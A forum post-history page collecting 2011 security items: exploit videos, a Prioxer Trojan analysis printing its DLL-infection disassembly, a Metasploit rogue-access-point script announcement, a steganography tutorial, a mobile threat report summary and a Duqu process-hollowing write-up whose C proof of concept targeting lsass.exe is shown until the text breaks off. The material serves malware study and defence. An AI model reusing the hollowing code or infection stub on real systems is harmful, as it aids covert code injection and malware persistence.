Everything posted by Nytro

  1. Wordpress Xss + Internet Explorer 8 Exploit
Fri 04 Nov 2011
Description: Wordpress 3.0.3 comment XSS. This video shows how easy it is for anyone to craft an evil comment that redirects the victim to a server hosting an exploit for Internet Explorer 8 (CVE-2010-3971).
Video: http://www.securitytube.net/video/2413
http://www.youtube.com/watch?v=BXmXEKfxZQc&feature=player_embedded#!

  2. Overflow Exploitation, Step By Step
Uploaded by DHAtEnclaveForensics on Nov 3, 2011
I previously had this chopped up into pieces that were pretty hard to watch. Now that I'm allowed to have videos longer than 15 minutes, I thought I'd give you the uncut version! Here's the entire 1 hour talk from beginning to end. Links to the source code for the server being compromised and a blog entry can be found here: Metasploit Exploit Creation, Step By Step | Security, buffer overflow, exploits, Vulnerability, Metasploit, Tutorial | Enclave Forensics. For other great short videos, try Auditcasts.
Duration: 01:04:57
Video: http://www.youtube.com/watch?v=8xonDJe3YxI&feature=youtube_gdata
  3. Malware analysis - Prioxer
05/11/2011

Introduction

An (IRC) friend, Horgh, told me: "Why not study Prioxer, it could be fun?" But what is Prioxer? It is simply a backdoor Trojan whose dropper has its own parser for the NTFS and FAT formats. That's why it's fun :], it was a cool way to study approximately how the NTFS file system can work.

Prioxer

First I looked around to find a sample (31/42):
MD5   : 7e3903944eab7b61b495572baa60fb72
SHA1  : 116930517baab6bdb0829990a43af54d155f5332
SHA256: 06e921abf28c4b260c59d61d84a74c3a5dc12ac99a34110ca5480ce61689385c

The thing it will do is infect the DLL "dhcpcsvc.dll" (we will see afterwards what the purpose of the infection is).

NTFS

(This is not a tutorial about NTFS; it is just the result of all the stuff reversed from Prioxer. I wanted to have fun with IDA and take on a challenge by not looking too much at documentation or source code like ntfs-3g, so if there are some mistakes, please refer to your friend Google for more about NTFS.)

But it will not directly open a handle (CreateFile()) on this file, which is located in "%SYSTEMROOT%/System32/". It will open a handle on your current hard disk drive (like C:). So here is a diagram of how it works:

The first thing we must know about NTFS: all data stored on a volume is contained in files, including the data structures used to locate and retrieve files. An NTFS volume always starts with a data structure named the NTFS Volume Boot Record, which is there to gather a maximum of information about the volume, like Number Of Sectors, Bytes Per Sector, etc. Then with this information we can access the MFT (Master File Table), which is the heart of NTFS; it is implemented as an array of file records. It will contain one record for each file on the volume, including a record for the MFT itself. I will not describe all these files, but a special one: the Root directory (also known as "\" or "$I30").

This file record contains an index of the files and directories stored in the root of the NTFS directory structure. You have understood that Prioxer will use this file record :]. But! If you look at my diagram, we know Root_Directory is the fifth entry in the array of file records, and I don't know why they do that, but they compute the offset to read this file record with values found in the $DATA attribute of the MFT. Why don't they compute the offset in this simple way: MFT_Addr + sizeof(FILE_ENTRY) * 5? Anyway, it's not important :], we continue our investigation.

The thing to know is that every FILE_RECORD has a list of attributes (especially these):
$DATA (0x80): contents of the file.
$INDEX_ROOT, $INDEX_ALLOCATION (0x90 / 0xA0): implement file name allocation.

And a new diagram of how the mechanism works (I simplified things): a directory is simply an index of file names (along with their file references), organized like a B-tree. VCN means Virtual Cluster Number; a VCN is a value linked to an LCN (Logical Cluster Number), which allows reading and writing directly on the hard disk. So, in our case Prioxer will traverse the root directory, look for the WINDOWS directory node, then traverse the "WINDOWS" node, get the "SYSTEM32" node, and get dhcpcsvc.dll. And it is now able to read and write (with the ReadFile() and WriteFile() APIs) directly to the VCNs of this file.

I will not explain more about NTFS. First, I'm not familiar with this file system (new for me), and working almost only with IDA took me about 2 ~ 3 evenings to understand well how Prioxer works. Next time I will read some docs :], it will be easier.
Oh, by the way, I wrote some shit for parsing only my root directory:

FileSystemName = NTFS
[+] Some information about NTFS BPB
Sector Size = 512
Sector Per Cluster = 8
Reserved Sectors = 0
Media Descriptor ID = 248
Sector Per Track = 56
Number Of Heads = 255
Hidden Sectors = 56
TotalSectors = 41926023
Starting Cluster Number for the $MFT = 786432
Starting Cluster Number for the $MFTMirror = 2620376
Clusters Per File Record = 246
Clusters Per Index Block = 1
Volume Serial Number =
[+] End Information about NTFS BPB
+ Sector Size = 512 bytes
+ Cluster Size = 4096 bytes
+ FileRecord Size = 1024 bytes
Size = 0
[+] FILERECORDMAGIC OK
+ OffsetOfAttr = 38
[+] Information about actual ATTRIBUTE
ATTRTYPE = 10
Value Length = 30
CreateTime = 2d458880
[+] Information about actual ATTRIBUTE
ATTRTYPE = 30
Value Length = 44
ParentRef = 5
AllocSize = 0
RealSize = 0
[+] Information about actual ATTRIBUTE
ATTRTYPE = 50
[+] Information about actual ATTRIBUTE
ATTRTYPE = 90
NameLength = 4
NameOffset = 18
Name = $I30
Attrtype = 30
EntryOffset = 10
TotalEntrySize = 28
AllocEntrySize = 28
Flags = 1
FileReference = 0
Size = 18
StreamSize = 0
Flags = 3
-- INDEX ENTRY --
FileReference = 0
Size = 18
StreamSize = 0
Flags = 3
SUB NODE ! GetSubNodeVCN = 0
[+]STREAM OK ... Name : $AttrDef
[+]STREAM OK ... Name : $BadClus
[+]STREAM OK ... Name : $Bitmap
[+]STREAM OK ... Name : $Boot
[+]STREAM OK ... Name : $Extend
[+]STREAM OK ... Name : $LogFile
[+]STREAM OK ... Name : $MFT
[+]STREAM OK ... Name : $MFTMirr
[+]STREAM OK ... Name : $Secure
[+]STREAM OK ... Name : $UpCase
[+]STREAM OK ... Name : $Volume
[+]STREAM OK ... Name : .
[+]STREAM OK ... Name : AUTOEXEC.BAT
[+]STREAM OK ... Name : boot.ini
[+]STREAM OK ... Name : Bootfont.bin
[+]STREAM OK ... Name : CONFIG.SYS
[+]STREAM OK ... Name : Documents and Settings
[+]STREAM OK ... Name : DOCUME~1
[+]STREAM OK ... Name : IO.SYS
[+]STREAM OK ... Name : MSDOS.SYS
[+]STREAM OK ... Name : NTDETECT.COM
[+]STREAM OK ... Name : ntldr
[+]STREAM OK ... Name : pagefile.sys
[+]STREAM OK ... Name : Program Files
[+]STREAM OK ... Name : PROGRA~1
[+]STREAM OK ... Name : RECYCLER
[+]STREAM OK ... Name : System Volume Information
[+]STREAM OK ... Name : SYSTEM~1
[+]STREAM OK ... Name : Toolz
[+]STREAM OK ... Name : WINDOWS
Last Index Entry
-- END INDEX ENTRY --
LAST INDEX !!!
[+] Information about actual ATTRIBUTE
ATTRTYPE = a0
[+] Information about actual ATTRIBUTE
ATTR_TYPE = b0

And here is the source code: main.c, ReadCluster.c, ntfs.h

Infection

OK, so now we know that Prioxer will do some shit with this file, but what!? Prioxer will change the offset value of the "ServiceMain" exported function, and put some code in the .text section at the changed ServiceMain offset:

.text:7D4EC895                 public ServiceMain
.text:7D4EC895 ServiceMain     proc near               ; DATA XREF: .text:off_7D4D1FCCo
.text:7D4EC895                 inc     ecx
.text:7D4EC896                 dec     ecx
.text:7D4EC897                 add     eax, 0
.text:7D4EC89A                 add     edi, 0
.text:7D4EC89D                 or      eax, 0
.text:7D4EC8A0                 pusha
.text:7D4EC8A1                 inc     edi
.text:7D4EC8A2                 dec     edi
.text:7D4EC8A3                 push    'll'
.text:7D4EC8A8                 inc     eax
.text:7D4EC8A9                 dec     eax
.text:7D4EC8AA                 push    'd.3i'
.text:7D4EC8AF                 xor     ebx, 0
.text:7D4EC8B2                 push    'patc'
.text:7D4EC8B7                 mov     edx, edx
.text:7D4EC8B9                 push    esp             ; lpLibFileName
.text:7D4EC8BA                 or      esi, 0
.text:7D4EC8BD                 call    ds:__imp__LoadLibraryA@4 ; LoadLibraryA(x)
.text:7D4EC8C3                 xor     ebx, 0
.text:7D4EC8C6                 pop     eax
.text:7D4EC8C7                 push    eax
.text:7D4EC8C8                 pop     eax
.text:7D4EC8C9                 pop     eax
.text:7D4EC8CA                 inc     edx
.text:7D4EC8CB                 dec     edx
.text:7D4EC8CC                 pop     eax
.text:7D4EC8CD                 mov     esi, esi
.text:7D4EC8CF                 popa
.text:7D4EC8D0                 add     esi, 0
.text:7D4EC8D3                 mov     eax, offset _ServiceMain@8 ; ServiceMain(x,x)
.text:7D4EC8D8                 mov     ecx, ecx
.text:7D4EC8DA                 jmp     eax
.text:7D4EC8DA ServiceMain     endp

The snippet of code will simply load a library with a random name, in our case "ctapi3.dll", dropped by Prioxer, and then jump to the real address of ServiceMain.

I will not study this DLL (you can find it directly in the resources); it is simply a botnet component that can exchange commands and data over IRC with a command-and-control server. Then it writes a .bat file and executes it to delete the dropper. The only interesting thing was the infection method via an NTFS parser, infecting a Windows DLL which will be loaded each time you want to use DHCP.

Another interesting fact is a side effect of this technique: you can find a dllcache directory in %SYSTEMROOT%; NTFS maintains it for some often-used system files. That's why, if you are infected by this Trojan, you won't be able to see the difference on dhcpcsvc.dll, but a tool like GMER with its own NTFS parser can do it, or if you reboot your computer you will be able to see it, and your AV too.

Conclusion

Big thanks to Horgh for the idea of Prioxer. What is the next target?

Source: w4kfu's bl0g
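The dump above comes from w4kfu's own parser (main.c / ReadCluster.c / ntfs.h, which are not reproduced on this page). What follows is an added example, written for this page and not taken from the post or from Prioxer, that does the two steps the dump shows with bounds checks: reading the geometry out of the $Boot sector, where the "clusters per file record" byte is signed (that is how 246, i.e. 0xF6 = -10, becomes a 1024-byte FILE record in the dump), and walking the attribute headers of a FILE record. It also applies the update-sequence fixups that NTFS stamps over the last two bytes of every sector of a multi-sector record, a step the post does not mention but which must happen before any offset inside the record is trusted. The boot sector and the record are constructed in memory with the dump's values; nothing here touches a real volume.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* NTFS on-disk fields are little-endian; read and write them byte-wise. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static uint64_t rd64(const uint8_t *p) { return rd32(p) | ((uint64_t)rd32(p + 4) << 32); }
static void wr32(uint8_t *p, uint32_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24); }

struct ntfs_geom { uint32_t sector, cluster, record, index; uint64_t mft_off; };

/* Parse the $Boot sector (BPB + extended BPB). 0 on success, -1 if it is not NTFS. */
int parse_boot(const uint8_t *bs, struct ntfs_geom *g)
{
    if (memcmp(bs + 3, "NTFS    ", 8) != 0 || rd16(bs + 0x1FE) != 0xAA55)
        return -1;
    g->sector  = rd16(bs + 0x0B);
    g->cluster = g->sector * bs[0x0D];
    if (g->sector == 0 || g->cluster == 0)
        return -1;
    g->mft_off = rd64(bs + 0x30) * g->cluster;          /* $MFT LCN -> byte offset on the volume */
    /* Both "clusters per ..." bytes are signed: a negative n means 2^-n bytes
       regardless of cluster size, so 0xF6 (-10) gives 1024-byte FILE records. */
    int8_t cr = (int8_t)bs[0x40], ci = (int8_t)bs[0x44];
    g->record = cr < 0 ? 1u << -cr : (uint32_t)cr * g->cluster;
    g->index  = ci < 0 ? 1u << -ci : (uint32_t)ci * g->cluster;
    return 0;
}

/* Undo the update sequence array: on disk the last two bytes of every sector
   of the record hold the USN and the real bytes sit in the array. A mismatch
   means a torn write, and the record must not be parsed at all. */
int apply_fixups(uint8_t *rec, uint32_t rec_size, uint32_t sector)
{
    uint16_t usa_off = rd16(rec + 4), usa_cnt = rd16(rec + 6);
    if (usa_cnt != rec_size / sector + 1 || usa_off + 2u * usa_cnt > rec_size)
        return -1;
    uint16_t usn = rd16(rec + usa_off);
    for (uint16_t i = 1; i < usa_cnt; i++) {
        uint8_t *tail = rec + i * sector - 2;
        if (rd16(tail) != usn)
            return -1;
        memcpy(tail, rec + usa_off + 2 * i, 2);
    }
    return 0;
}

/* Walk the attribute headers of a FILE record (type, length, ...) up to the
   0xFFFFFFFF end marker. Stores up to max type codes, returns their count,
   or -1 when a length would run off the record. */
int list_attrs(const uint8_t *rec, uint32_t rec_size, uint32_t *types, int max)
{
    if (memcmp(rec, "FILE", 4) != 0)
        return -1;
    uint32_t off = rd16(rec + 0x14);                    /* first attribute offset */
    int n = 0;
    while (off + 8 <= rec_size) {
        uint32_t type = rd32(rec + off), len = rd32(rec + off + 4);
        if (type == 0xFFFFFFFF)
            return n;
        if (len < 16 || len % 8 || off + len > rec_size)
            return -1;
        if (n < max)
            types[n] = type;
        n++;
        off += len;
    }
    return -1;                                          /* no end marker inside the record */
}

/* Constructed $Boot sector carrying the values from the dump. */
void make_boot(uint8_t *bs)
{
    memset(bs, 0, 512);
    memcpy(bs + 3, "NTFS    ", 8);
    bs[0x0B] = 0x00; bs[0x0C] = 0x02;                   /* 512 bytes per sector */
    bs[0x0D] = 8;                                       /* 8 sectors per cluster = 4096 */
    bs[0x30] = 0x00; bs[0x31] = 0x00; bs[0x32] = 0x0C;  /* $MFT LCN 786432 = 0x0C0000 */
    bs[0x40] = 0xF6;                                    /* clusters per FILE record = -10 */
    bs[0x44] = 0x01;                                    /* clusters per index block = 1 */
    bs[0x1FE] = 0x55; bs[0x1FF] = 0xAA;
}

/* Constructed 1024-byte FILE record as it looks on disk: USA at 0x30, USN
   stamped over both sector tails, attributes 0x10 / 0x30 / 0x90 at 0x38. */
void make_record(uint8_t *rec)
{
    static const uint32_t attrs[3][2] = { {0x10, 0x60}, {0x30, 0x68}, {0x90, 0x20} };
    memset(rec, 0, 1024);
    memcpy(rec, "FILE", 4);
    rec[4] = 0x30; rec[6] = 3;                          /* USA offset; USN + one entry per sector */
    rec[0x30] = 0x01;                                   /* USN = 1 */
    rec[0x32] = 'x'; rec[0x33] = 'y';                   /* real bytes for the tail of sector 0 */
    rec[0x34] = 'z'; rec[0x35] = 'w';                   /* real bytes for the tail of sector 1 */
    rec[0x1FE] = 0x01; rec[0x3FE] = 0x01;               /* on-disk tails carry the USN */
    rec[0x14] = 0x38;
    uint32_t off = 0x38;
    for (int i = 0; i < 3; i++) {
        wr32(rec + off, attrs[i][0]);
        wr32(rec + off + 4, attrs[i][1]);
        off += attrs[i][1];
    }
    wr32(rec + off, 0xFFFFFFFF);
}

int main(void)
{
    uint8_t bs[512], rec[1024];
    uint32_t types[8];
    struct ntfs_geom g;
    make_boot(bs);
    make_record(rec);
    if (parse_boot(bs, &g) != 0 || apply_fixups(rec, g.record, g.sector) != 0)
        return 1;
    printf("sector=%u cluster=%u record=%u index=%u, $MFT at byte %llu\n",
           g.sector, g.cluster, g.record, g.index, (unsigned long long)g.mft_off);
    int n = list_attrs(rec, g.record, types, 8);
    for (int i = 0; i < n; i++)
        printf("attribute type 0x%02X\n", types[i]);
    return n < 0;
}
```

Reading from the raw volume handle the way Prioxer does (CreateFile on the drive, then ReadFile at mft_off and at the VCNs of the index) is the same parse; only the source of the bytes changes. The fixup check is also the cheapest integrity signal you get for free: a record whose sector tails do not all carry the USN was never written completely.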
  4. Easy Wireless Honey-Pots using Win7 and Metasploit

I found myself inspired by Vivek Ramachandran's videos, so I thought I would take the honor of creating the simple meterpreter script that basically does what you see in the third installment of the SWSE Addendum videos. When I watched the third video I thought to myself, "This shouldn't be too difficult to do". From my perception, I think that Vivek was kind of hinting that he might have wanted to see someone in the info-sec community create a meterpreter script that does what you see in this video. I was glad to do this.

For penetration testers, this script means that they can now more easily set up rogue wireless access points by using the soft AP feature that is built into Windows 7 and Windows 2008. If the victim computers are part of a Windows domain and have wireless NICs, by automating Metasploit with a pass-the-hash attack and using my script, one could essentially automate deploying a series of rogue APs throughout a domain. This would be kind of like a network worm. If you're curious about automating Metasploit, please see: http://dev.metasploit.com/redmine/projects/framework/repository/revisions/8878/entry/documentation/msfconsole_rc_ruby_example.rc

My script gives the end user the option of installing the meterpreter service on the victim computer. I thought that giving this option would be ideal in case the victim computer ends up rebooting. If you were just to deploy the soft AP and run a bind payload, the bind payload most likely wouldn't survive a reboot.

The script is available here:
http://zitstif.no-ip.org/meterpreter/rogueap.rb
http://zitstif.no-ip.org/meterpreter/rogueap.txt

If you have any issues and you need help, feel free to contact me. Additionally, don't hesitate to modify the script if you need/want to do so.

via zitstif.no-ip.org
Source: http://www.securityaegis.com/easy-wireless-honey-pots-using-win7-and-metasploit/
  5. Steganography Made Easy in Linux
Published on Friday, 04 November 2011 13:16

1. Introduction

Steganography is the art of hiding messages within other messages or data. Most commonly we see this utilized with pictures. This is probably encryption at its finest, mostly because it doesn't look like the usual garbled text that we are used to seeing with encryption. The changes made by steganography are so slight that the human eye cannot perceive them. Even trained cryptographers may have an encoded message inside a picture and be unaware of it. There is a very deep science to this. Usually this is done by flipping parity bits at the binary level. While it is great to learn how this works, sometimes it can be a very tedious job. Fortunately for us there is a tool that will take away most of the grunt work.

2. Legal Disclaimer

Before we begin, I should say that I do not condone the knowledge used in this article for anything other than hiding legal information. The purpose of this is to illustrate how to keep secrets safe. I should also note to please research your country's laws on encryption and its exportation before using this tool. No matter how free you believe your country is, you may be shocked to find out how stifling some of the laws on encryption are.

3. Installation

SteGUI is a graphical front-end for the program known as Steghide. SteGUI is available for download as an rpm package and a tarball source. One might assume that the source would compile flawlessly on Debian and Ubuntu since no deb package is provided. But while trying to compile from source with Debian Sid and Backtrack 5, I found myself in what is commonly known as "dependency hell". To save yourself some trouble and time, just download the rpm package. From here you can just issue alien -d SteGUI.rpm to produce a Debian package that installs much more easily. From there dpkg -i SteGUI.deb should install without problems.

4. Usage

Once you are up and running, the GUI is very simple to comprehend. From the File tab select "Open File" to choose a jpg file to use. While any jpg will do, very large messages will require very large pictures to hide them without altering the image to the eye. Now that you have a jpg, go to the Actions tab and select "Embed". From here a box will pop up with a couple of requirements and options to fill out. In this example I have entered the path on my computer for a text file named passwd.txt into "File to embed for cover file". This would be the secret text that we wish to hide as it passes along the Internet. Next is the "File to use as cover" line. This is simply the path to the picture we wish to hide the passwd.txt inside. We must also select "File to use as output stegofile". We can name this anything, as long as we include the .jpg file extension. Here I simply chose out.jpg.

We are going to leave all the check boxes at their defaults here. I would like to explain what some of these are for, though. The encryption box here is rather interesting. There are several decent encryption ciphers offered in the drop-down menu. Some you may have heard of, like the Rijndael cipher, Blowfish, DES, and Triple-DES. While none of these are unbreakable, they're not exactly kid's stuff either. Next is the check box for compression. You might think this is counter-productive. After all, too much compression can affect image quality, possibly giving away that the file has been altered. While this is true, what would you think if you found a .jpg that is 17MB? Hopefully you would know something is wrong. While that's extreme, it illustrates my point. Compression is used to try and pack the file size back down to the original. The other check boxes should be self-explanatory.

Let's look at the pass-phrase down at the bottom here. This is what the recipient of this message will use to open it. Needless to say, the normal rules should apply here as with regular passwords: nothing in the dictionary; use upper and lower case along with some special characters. You can see from the asterisks in the picture here that I have quite a few characters in this password. I can't stress enough that a good pass-phrase is important. This is what unlocks your encryption and makes the text readable again. Without this, your encryption would be pointless against a brute-force attack.

Now it is time for our recipient to open this file. After they open this jpg in SteGUI they simply go to the Actions tab and select "Extract". Another pop-up box will appear to input the necessary files. The input file at the top will simply be the jpg that we have sent them. The output file will be a new file we can name anything. Here I've just made it a file called out.txt. Now that we have our information in a text file we can easily open it for display.

# cat out.txt
password

5. White Noise

While studying computer forensics, steganography came up a lot in my class. My professor had a lot of experience deciphering images while employed with the American FBI and Homeland Security. One day I asked him, "How do you know for sure what you are looking at isn't a false positive?" His answer floored me: "You don't, until there's a pattern." So it occurred to me that one could probably gain security by producing a lot of white noise. White noise has many definitions, especially when it comes to security. If one suspected their home was bugged, you could spend hours blasting annoying music in hopes of confusing, or boring to sleep, anyone listening in. In this case, sending a lot of traffic of unaltered pictures before and after our encoded text may give the illusion that your altered jpg is a false positive, since the last 24 you sent were clean.

6. Detection

Stegdetect is a command-line program for detecting steganography in jpgs. It is also made by the same people who brought you Steghide and SteGUI. Stegdetect looks for algorithms used by other commercial steganography programs like Outguess, Jsteg, Jphide, Camouflage, AppendX and Invisible Secrets. It also offers a sub-program called Stegbreak that will use brute force to find steganography made by the programs I just mentioned. About the only thing Stegdetect isn't good at doing is finding things made by Steghide! There was no option for searching for its algorithms. I took a shot at searching the jpg we made with the parameters set to run all possible tests against it, and came up with nothing.

# stegdetect -t jopifa out.jpg
out.jpg : negative

There appears to be no ready-built, open source software for finding steganography made by Steghide. At least not without thousands of dollars for proprietary forensics software. For now, cheaply deciphering messages made by Steghide or SteGUI will have to be done the old-fashioned way: with a lot of ones and zeros.

7. Conclusion

This is probably as easy as steganography will ever get. This program is impressive because it has taken something that used to only be done in binary and brought it down to point-and-click level. Some may see this as dumbing down the art that steganography is. But in an emergency you need a tool that moves fast! Probably even the best binary programmer can't move as quickly as this GUI interface. Armed with speed, stealth, and weapons-grade encryption, this open source program is a formidable adversary. Please show your support for the Steghide and SteGUI teams that made this tool possible. Visit our Linux forum if you have some questions in regards to this or any other Linux related topic.

Source: http://how-to.linuxcareer.com/steganography-made-easy-in-linux
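The article's one-line explanation ("flipping parity bits at the binary level") is easy to show in the spatial domain, even though Steghide itself works differently: it embeds in JPEG coefficients and encrypts the payload first, which is one reason a signature-based checker has nothing to match. The block below is an added example for this page, not code from the article or from Steghide: a least-significant-bit embed and extract over a constructed 8-bit raster (a 256-byte ramp stands in for pixel samples), with a 32-bit length header so the extractor knows where to stop. The last function shows what the extractor sees on a clean cover, a "length" that exceeds the capacity, which is the false-positive problem from section 5 in miniature. Nothing here is encrypted; a real tool would encrypt before embedding.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Payload bytes that fit after the 32-bit length header, one bit per cover byte. */
size_t lsb_capacity(size_t cover_len)
{
    return cover_len / 8 > 4 ? cover_len / 8 - 4 : 0;
}

static void put_bit(uint8_t *cover, size_t i, unsigned bit)
{
    cover[i] = (uint8_t)((cover[i] & 0xFE) | (bit & 1));   /* only the parity bit moves */
}

static unsigned get_bit(const uint8_t *cover, size_t i)
{
    return cover[i] & 1;
}

/* Write msg into the LSBs of cover, MSB-first, preceded by its big-endian length.
   Returns 0, or -1 when the cover is too small to hold it. */
int lsb_embed(uint8_t *cover, size_t cover_len, const uint8_t *msg, uint32_t msg_len)
{
    if (cover_len < 32 || msg_len > lsb_capacity(cover_len))
        return -1;
    size_t pos = 0;
    for (int b = 31; b >= 0; b--)
        put_bit(cover, pos++, msg_len >> b);
    for (uint32_t i = 0; i < msg_len; i++)
        for (int b = 7; b >= 0; b--)
            put_bit(cover, pos++, msg[i] >> b);
    return 0;
}

/* Read the header and message back. Returns the length, or -1 when the header
   is implausible (larger than the cover or than out can hold). On an untouched
   cover the "length" is just the cover's own low bits, so this is also what a
   clean image looks like to the extractor. */
long lsb_extract(const uint8_t *cover, size_t cover_len, uint8_t *out, size_t out_max)
{
    if (cover_len < 32)
        return -1;
    size_t pos = 0;
    uint32_t len = 0;
    for (int b = 0; b < 32; b++)
        len = (len << 1) | get_bit(cover, pos++);
    if (len > lsb_capacity(cover_len) || len > out_max)
        return -1;
    for (uint32_t i = 0; i < len; i++) {
        unsigned c = 0;
        for (int b = 0; b < 8; b++)
            c = (c << 1) | get_bit(cover, pos++);
        out[i] = (uint8_t)c;
    }
    return (long)len;
}

/* Bytes that differ between clean and stego cover: each differs by at most 1
   in value, and no more bytes change than bits were embedded. */
size_t count_changed(const uint8_t *clean, const uint8_t *stego, size_t n)
{
    size_t d = 0;
    for (size_t i = 0; i < n; i++)
        d += clean[i] != stego[i];
    return d;
}

int main(void)
{
    /* Constructed cover: a 256-byte 8-bit ramp standing in for pixel samples. */
    uint8_t clean[256], stego[256], out[32];
    for (int i = 0; i < 256; i++)
        clean[i] = stego[i] = (uint8_t)i;
    const char *secret = "password";
    if (lsb_embed(stego, sizeof stego, (const uint8_t *)secret, 8) != 0)
        return 1;
    long n = lsb_extract(stego, sizeof stego, out, sizeof out);
    printf("recovered %ld bytes: %.*s, %zu cover bytes changed\n",
           n, (int)n, out, count_changed(clean, stego, sizeof stego));
    printf("clean cover extracts as length %ld\n",
           lsb_extract(clean, sizeof clean, out, sizeof out));
    return 0;
}
```

The detection side follows from the same arithmetic: sequential LSB embedding flattens the pairs-of-values histogram of the touched region, which is what chi-square style tests look for, and the length header at a fixed position is a signature of its own. Both are reasons real tools spread bits pseudo-randomly under a key instead of writing them in order as this example does.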
  6. Lookout Mobile Threat Report August 2011

Table of Contents
Highlights
Research Methodology
Why Mobile Security is Important
Mobile OS Security Model Comparison
Platform Vulnerabilities and Patch Management
Mobile Threats
Mobile Malware Trends
What's Next?
Tips To Stay Safe
About Lookout

HIGHLIGHTS
- Both web-based and app-based threats are increasing in prevalence and sophistication.
- Android users are two and a half times as likely to encounter malware today as 6 months ago, and three out of ten Android owners are likely to encounter a web-based threat on their device each year.
- An estimated half million to one million people were affected by Android malware in the first half of 2011; Android apps infected with malware went from 80 apps in January to over 400 apps cumulative in June 2011.
- Attackers are deploying a variety of increasingly sophisticated techniques to take control of the phone, personal data, and money. Additionally, malware writers are using new distribution techniques, such as malvertising and upgrade attacks.

Download: https://www.mylookout.com/_downloads/lookout-mobile-threat-report-2011.pdf
  7. Duqu - New method of injection
06/11/2011

Introduction

I discovered a new method of injection (I don't know if it is really new) in a malware dropped by Duqu. So I want to share it with you and, as usual, write a PoC.

Injection Method

The malware in question is simply a keylogger, but it uses a nice trick for injecting into another process. First it will create (as usual) a suspended lsass.exe process via CreateProcess(). Then it will gather process information via ZwQueryInformationProcess(), especially PebBaseAddress. But what can it do with this address? If we look at the PEB struct:

>dt nt!_PEB
   +0x000 InheritedAddressSpace    : UChar
   +0x001 ReadImageFileExecOptions : UChar
   +0x002 BeingDebugged            : UChar
   +0x003 SpareBool                : UChar
   +0x004 Mutant                   : Ptr32 Void
   +0x008 ImageBaseAddress         : Ptr32 Void

It will get the ImageBaseAddress at offset 0x8 by reading it with ReadProcessMemory(). Then it creates a section with ZwCreateSection(); then, in the current process (not in the suspended lsass.exe), it calls ZwMapViewOfSection() with the BaseAddress argument equal to the ImageBaseAddress of the lsass.exe process; then it will do the same operation on the lsass.exe process. But wait! If we read the documentation of ZwMapViewOfSection, we will get an NTSTATUS equal to STATUS_CONFLICTING_ADDRESSES... and the answer is no, because before the second ZwMapViewOfSection it will perform ZwUnmapViewOfSection() with BaseAddress equal to ImageBaseAddress on the lsass.exe process. And if you wonder "Wait, what!? Is it possible?", the answer is yes. With this trick the malware is able to replace ALL of the PE image of the suspended process. In my case it will replace the entry point with a jmp to another section that it created, before this trick, inside lsass.exe.

PoC

So I decided to rewrite this trick, to understand well the stuff done by the malware (maybe you will better understand what I explained before).
main.c:

#include "main.h"

/* Walk the PE headers of the image copied out of the target and return its entry-point RVA. */
DWORD get_entrypoint(char *read_proc)
{
    PIMAGE_DOS_HEADER idh = (PIMAGE_DOS_HEADER)read_proc;
    PIMAGE_NT_HEADERS inh = (PIMAGE_NT_HEADERS)((BYTE *)read_proc + idh->e_lfanew);

    printf("Entrypoint = %x\n", inh->OptionalHeader.AddressOfEntryPoint);
    return inh->OptionalHeader.AddressOfEntryPoint;
}

int main(void)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    WCHAR path_lsass[260];
    PROCESS_BASIC_INFORMATION pbi;
    SIZE_T nb_read;
    DWORD ImageBase;
    HANDLE hsect;
    NTSTATUS stat;
    PVOID BaseAddress = NULL;
    DWORD eip;
    LARGE_INTEGER a;
    SIZE_T size;
    char read_proc[0x2000];

    memset(&si, 0, sizeof(STARTUPINFO));
    si.cb = sizeof(STARTUPINFO);
    memset(&pi, 0, sizeof(PROCESS_INFORMATION));
    memset(&pbi, 0, sizeof(PROCESS_BASIC_INFORMATION));

    ExpandEnvironmentStrings(L"%SystemRoot%\\system32\\lsass.exe", path_lsass, 260);
    wprintf(L"[+] New Path for lsass.exe = %s\n", path_lsass);

    /* Create the target suspended: its image is mapped, but no code has run yet. */
    if (!CreateProcess(path_lsass, NULL, NULL, NULL, FALSE,
                       CREATE_SUSPENDED | DETACHED_PROCESS | CREATE_NO_WINDOW,
                       NULL, NULL, &si, &pi))
    {
        printf("[-] CreateProcessW failed\n");
        printf("LastError = %x\n", GetLastError());
        return -1;
    }

    /* Resolve the native API from ntdll; none of these are in the import libraries. */
    ZwQueryInformationProcess = (NTSTATUS (__stdcall *)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG))
        GetProcAddress(GetModuleHandleA("ntdll"), "ZwQueryInformationProcess");
    ZwMapViewOfSection = (NTSTATUS (__stdcall *)(HANDLE, HANDLE, PVOID *, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, DWORD, ULONG, ULONG))
        GetProcAddress(GetModuleHandleA("ntdll"), "ZwMapViewOfSection");
    ZwUnmapViewOfSection = (NTSTATUS (__stdcall *)(HANDLE, PVOID))
        GetProcAddress(GetModuleHandleA("ntdll"), "ZwUnmapViewOfSection");
    ZwCreateSection = (NTSTATUS (__stdcall *)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, HANDLE))
        GetProcAddress(GetModuleHandleA("ntdll"), "ZwCreateSection");
    if (ZwMapViewOfSection == NULL || ZwQueryInformationProcess == NULL
        || ZwUnmapViewOfSection == NULL || ZwCreateSection == NULL)
    {
        printf("[-] GetProcAddress failed\n");
        return -1;
    }

    /* ProcessBasicInformation (class 0) gives the PEB address of the suspended process. */
    if (ZwQueryInformationProcess(pi.hProcess, 0, &pbi, sizeof(PROCESS_BASIC_INFORMATION), NULL) != 0)
    {
        printf("[-] ZwQueryInformationProcess failed\n");
        return -1;
    }
    printf("[+] UniqueProcessID = 0x%x\n", (unsigned)pbi.UniqueProcessId);

    /* PEB+0x8 is ImageBaseAddress in the 32-bit PEB layout shown above. */
    if (!ReadProcessMemory(pi.hProcess, (BYTE *)pbi.PebBaseAddress + 8, &ImageBase, 4, &nb_read) || nb_read != 4)
    {
        printf("[-] ReadProcessMemory failed\n");
        return -1;
    }
    printf("[+] ImageBase = 0x%x\n", ImageBase);

    /* Copy the first 0x2000 bytes of the target's image: headers plus the start of .text. */
